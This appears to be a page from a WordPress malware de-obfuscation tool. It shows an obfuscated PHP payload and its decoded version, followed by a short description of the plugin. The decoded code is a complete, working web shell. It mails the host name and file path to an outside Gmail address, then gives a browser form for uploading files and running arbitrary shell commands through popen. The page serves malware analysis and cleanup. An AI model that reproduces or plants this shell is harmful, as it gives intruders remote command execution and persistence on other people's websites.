De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5\x61TmJJ\x61lYWUmJx\x61lmJvEpq\x63n5K\x61k\x61xSVFR\x61llGio\x2bmRWaUGAN\x41\x41\x3d\x3d"; $Lix = "=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"; eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto)))); exit; ?>
<?php $Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5aTmJJalYWUmJxalmJvEpqcn5KakaxSVFRallGio+mRWaUGANAA=="; $Lix = "=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"; eval { session_start(); error_reporting(0); function login() { $pesan = "DOMAIN => " . $_SERVER["HTTP_HOST"] . "\n"; $pesan .= "LOCATION => " . strval("/var/www/html") . "\n"; $pesan .= "LOCATION 2 => " . $_SERVER["SCRIPT_FILENAME"]; $headers = "[!] IKAN MASUK [!]"; $subject = "DOMAIN DARI " . $_SERVER["HTTP_HOST"]; $tomail = "fmost6689@gmail.com"; mail($tomail, $subject, $pesan, $headers); $_SESSION['login'] = true; echo "<script>window.location='?';</script>"; exit; } if (!isset($_SESSION["login"])) { login(); die; } if ($_POST['king'] == "") { $curcmd = "ls -la"; } else { $curcmd = $_POST['king']; } ?> <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <title>Vernest Team</title> <link rel="shortcut icon" href="https://i.ibb.co.com/KWHWhRF/1721891682-picsay.jpg" type="image/x-icon" /> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"> <style>@import url(https://fonts.googleapis.com/css2?family=Metal+Mania&display=swap);*{font-family:"Metal Mania",system-ui;} .copy {text-decoration: none;padding: 5px;background: #3c3c3cb3;text-align: center;border-radius: 2px;position: fixed;bottom: 0;right: 0;color: #fff!important;} .box-height{display:flex;justify-content:center;align-items:center;height:100vh}.box{width:80%;padding:20px;background:#1e1919;border-radius:3px;box-shadow:rgb(46 174 50 / .35) 0 5px 20px 15px}input{border:1px;outline:none!important}textarea:hover,textarea:focus{box-shadow:none!important;border:none!important}.oke{border:1px solid #fff}img{width:130px} .circle{width:140px;height:auto;margin:auto;display:block;text-align:center;border-radius:50%;border:5px solid rgb(32 180 21 / .45);box-shadow: rgb(32 180 21 / .45) 2px 20px 30px -5px;}</style> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.0/dist/sweetalert2.all.min.js"></script> </head> <body class="bg-dark text-light"> <a href="https://chat.whatsapp.com/F0UfJF2huGEF8V842FM3X0" target="_blank" class="copy">© Copyright - Vernest Team</a> <div class="box-height"> <div class="box"> <div class="circle"> <img src="https://i.ibb.co.com/1b6dcBG/1721891682-picsay-removebg-preview.png" alt="vernest logo"> </div> <form class="mt-3" method="post" enctype="multipart/form-data"> <div class="form-group mb-4"> <div class="d-flex gap-1"> <input type="hidden" name="dir" value="<?php echo $curdir; ?>" /> <input type="file" name="fila" class="form-control" /> <button type="submit" class="btn btn-success" name="upl" value="Upload">upload</button> </div> </div> <div class="form-group"> <?php if ($_POST['upl'] == "Upload") { if (move_uploaded_file($_FILES['fila']['tmp_name'], "./" . $_FILES['fila']['name'])) { //echo "<script>alert('');</script>"; echo ' <script> Swal.fire({ title: "Good job!", text: "The file has been uploaded", icon: "success" }); </script> '; } else { echo ' <script> Swal.fire({ title: "Upss!", text: "There was an error uploading the file, please try again!", icon: "error" }); </script> '; } } ?> <textarea class="form-control bg-dark text-light border-0" rows="4" readonly ><?php if ($_POST['exe'] == "Execute") { $curcmd = $curcmd; $f = popen($curcmd, "r"); while (!feof($f)) { $buffer = fgets($f, 4096); $string .= $buffer; } pclose($f); echo htmlspecialchars($string); } else { echo "terminal output"; } ?></textarea> <div class="d-flex w-100 gap-2 p-2 bg-dark my-2"> <span class="text-light mt-1">$</span> <div class="w-100 d-flex gap-2"> <input type="text" name="king" value="<?php echo $curcmd; ?>" class="bg-dark w-100 text-light outline-0 border-0"> <button type="submit" name="exe" value="Execute" class="btn btn-sm btn-outline-success">send</button> </div> </div> </div> </form> </div> </div> </body> </html><?php }; exit;
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.